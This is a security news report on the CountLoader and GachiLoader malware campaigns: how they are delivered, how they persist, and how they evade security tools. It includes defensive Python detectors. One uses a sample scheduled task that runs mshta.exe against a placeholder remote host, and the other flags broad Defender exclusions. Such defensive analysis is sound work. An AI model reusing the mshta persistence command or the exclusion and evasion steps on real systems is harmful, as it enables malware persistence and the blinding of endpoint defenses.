
Cybersecurity researchers have revealed details of a new campaign that used a cracked software distribution site as a distribution vector for a new version of a modular stealth loader known as CountLoader.
The Cyderes Howler Cell Threat Intelligence team said in its analysis that the campaign “uses CountLoader as the first tool in a multi-stage attack to access, evade, and distribute additional malware families.”
CountLoader has previously been documented by both Fortinet and Silent Push, who detailed the loader’s ability to push payloads such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been observed in the wild since at least June 2025.
The latest attack chain begins when an unsuspecting user attempts to download a cracked version of legitimate software, such as Microsoft Word, and is redirected to a MediaFire link hosting a malicious ZIP archive. That archive contains an encrypted ZIP file and a Microsoft Word document holding the password needed to open the second archive.
Inside the encrypted ZIP file is a renamed legitimate Python interpreter (‘Setup.exe’), configured to run a malicious command that retrieves CountLoader 3.2 from a remote server using ‘mshta.exe’.

To establish persistence, the malware creates a scheduled task that mimics Google, using the name “GoogleTaskSystem136.0.7023.12” together with an identifier-like string. The task is configured to run every 30 minutes for 10 years, invoking ‘mshta.exe’ against the fallback domain.
The loader also checks whether CrowdStrike’s Falcon security tool is installed on the host by querying the list of antivirus products via Windows Management Instrumentation (WMI). If Falcon is detected, the persistence command is changed to “cmd.exe /c start /b mshta.exe”; otherwise, it invokes “mshta.exe” on the URL directly.
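As an added illustration (not code from Cyderes or this article), the following Python checks an exported Task Scheduler XML definition for the persistence traits described above: mshta.exe launched directly or wrapped in “cmd.exe /c start /b” against a remote URL, a 30-minute repetition with a multi-year duration, and a Google-lookalike task name. The task XML and the domain in it are constructed placeholders, not indicators from the campaign.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace used by exported Task Scheduler XML.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task XML modelled on the persistence described above; the URL is a
# placeholder, not an indicator from the article.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
    <StartBoundary>2025-06-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c start /b mshta.exe http://fallback-c2.example.invalid/update</Arguments>
  </Exec></Actions>
</Task>"""

GOOGLE_LOOKALIKE = re.compile(r"^Google\w*\d+\.\d+\.\d+\.\d+$")
URL_RE = re.compile(r"https?://\S+", re.I)


def analyze_task(task_name: str, xml_text: str) -> list:
    """Return findings for one exported scheduled task (empty list = nothing suspicious)."""
    findings = []
    root = ET.fromstring(xml_text)
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).lower()
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS)
        # mshta.exe run directly, or wrapped as "cmd.exe /c start /b mshta.exe" (the
        # variant the loader picks when CrowdStrike Falcon is present)
        wrapped = "cmd" in cmd and "mshta" in args.lower()
        if "mshta" in cmd or wrapped:
            url = URL_RE.search(args)
            if url:
                findings.append(f"mshta.exe fetches remote HTA from {urlparse(url.group(0)).hostname}")
    for rep in root.findall(".//t:Triggers//t:Repetition", NS):
        interval = rep.findtext("t:Interval", default="", namespaces=NS)
        duration = rep.findtext("t:Duration", default="", namespaces=NS)
        if interval == "PT30M" and re.fullmatch(r"P\d+D", duration):
            findings.append(f"repeats every 30 minutes for {int(duration[1:-1])} days")
    if GOOGLE_LOOKALIKE.match(task_name):
        findings.append("task name imitates a Google updater with a version-like suffix")
    return findings
```

On a live host the same function can be fed the output of `schtasks /query /xml` for each task name.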

CountLoader is equipped to profile compromised hosts and fetch the next-stage payload. The latest version adds the ability to propagate via removable USB drives and to execute malware directly in memory via ‘mshta.exe’ or PowerShell. The complete list of supported features is as follows:
- Downloads and runs an executable file from the specified URL
- Downloads a ZIP archive from the specified URL and runs any Python-based module or EXE file present within it
- Downloads a DLL from the specified URL and runs it via ‘rundll32.exe’
- Downloads and installs an MSI installer package
- Removes scheduled tasks used by the loader
- Collects and extracts extensive system information
- Spreads via removable media by creating a malicious shortcut (LNK) that executes the original file on startup, placed next to its hidden original counterpart
- Executes malware via ‘mshta.exe’ with C2 parameters
- Launches ‘mshta.exe’ directly against the provided URL
- Executes a remote PowerShell payload in memory
In the attack chain observed by Cyderes, the final payload deployed by CountLoader is an information stealer known as ACR Stealer, which has the ability to collect sensitive data from infected hosts.
“This campaign highlights the continued evolution and sophistication of CountLoader, reinforcing the need for proactive detection and defense-in-depth strategies,” Cyderes said. “Its ability to deliver ACR Stealer through a multi-step process ranging from modifying Python libraries to unpacking in-memory shellcode highlights the growing trend of signed binary exploitation and fileless execution tactics.”
YouTube Ghost Network presents GachiLoader
This disclosure comes after Check Point revealed details of a new, highly obfuscated JavaScript malware loader written for Node.js called GachiLoader. The malware is distributed through the YouTube Ghost Network, a network of compromised YouTube accounts used to spread malware.

“One of the GachiLoader variants deploys a second stage of malware, Kidkadi, which implements a new technique for Portable Executable (PE) injection,” said security researchers Sven Rath and Jaromír Hořejší. “This technique loads a legitimate DLL and exploits vector exception handling to replace it with a malicious payload on the fly.”
As many as 100 YouTube videos were identified as part of the campaign, with approximately 220,000 views in total. The videos were uploaded from 39 compromised accounts, with the first dating back to December 22, 2024. Most of them have since been removed by Google.

In at least one case, GachiLoader served as a conduit for the Rhadamanthys information-stealing malware. Like other loaders, GachiLoader deploys additional payloads to infected machines while running a series of anti-analysis checks to fly under the radar.
The loader also checks whether it is running with administrator privileges by executing the “net session” command. If that fails, it attempts to relaunch itself with administrator privileges, which triggers a User Account Control (UAC) prompt. As in the CountLoader case, the malware is typically distributed through fake installers of popular software, which makes it more likely that victims will allow it to continue.

In the final phase, the malware attempts to kill ‘SecHealthUI.exe’, a process associated with Microsoft Defender, and configures Defender exclusions so that malicious payloads staged in specific folders (C:\Users\, C:\ProgramData\, C:\Windows\) are not flagged.
GachiLoader then either fetches the final payload directly from a remote URL or uses another loader named ‘kidkadi.node’ to load the main malware by abusing vectored exception handling.
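As an added example (not code from Check Point or this article), the following Python scans Defender operational-log lines for exclusion changes and rates how broad the excluded path is, so that whole-tree exclusions like the three folders named above stand out from a narrow per-application exclusion. The log lines are constructed in the shape of Defender Event ID 5007 (“Microsoft Defender Antivirus Configuration has changed”), not real telemetry.

```python
import re
from pathlib import PureWindowsPath

# Constructed lines in the shape of Defender Event ID 5007 "New value:" entries; not real logs.
SAMPLE_EVENTS = [
    "5007 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\ = 0x0",
    "5007 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ProgramData\\ = 0x0",
    "5007 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\ = 0x0",
    "5007 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Program Files\\Vendor\\app.exe = 0x0",
    "5007 New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1",
]

# Captures the excluded path written under Exclusions\Paths (value 0x0 = exclusion added).
EXCLUSION_RE = re.compile(r"Exclusions\\Paths\\(?P<path>.+?) = 0x0", re.I)
# Top-level trees whose exclusion blinds Defender to most user and system activity.
BROAD_ROOTS = {"users", "programdata", "windows"}


def classify_exclusion(path: str) -> str:
    """Rate an excluded path: 'critical' (whole drive), 'high' (broad tree), or 'low'."""
    parts = PureWindowsPath(path).parts  # e.g. ('C:\\', 'Users') for 'C:\Users\'
    if len(parts) == 1:
        return "critical"
    if len(parts) == 2 and parts[1].lower() in BROAD_ROOTS:
        return "high"  # the pattern GachiLoader leaves behind
    return "low"


def scan_events(lines):
    """Return (excluded_path, severity) for every exclusion-add event in the lines."""
    results = []
    for line in lines:
        m = EXCLUSION_RE.search(line)
        if m:
            results.append((m.group("path"), classify_exclusion(m.group("path"))))
    return results
```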
“The attackers behind GachiLoader are familiar with the internals of Windows and have devised new variations on known techniques,” Check Point said. “This highlights the need for security researchers to stay up-to-date on malware techniques such as PE injection, and to actively seek new ways for malware authors to try to evade detection.”
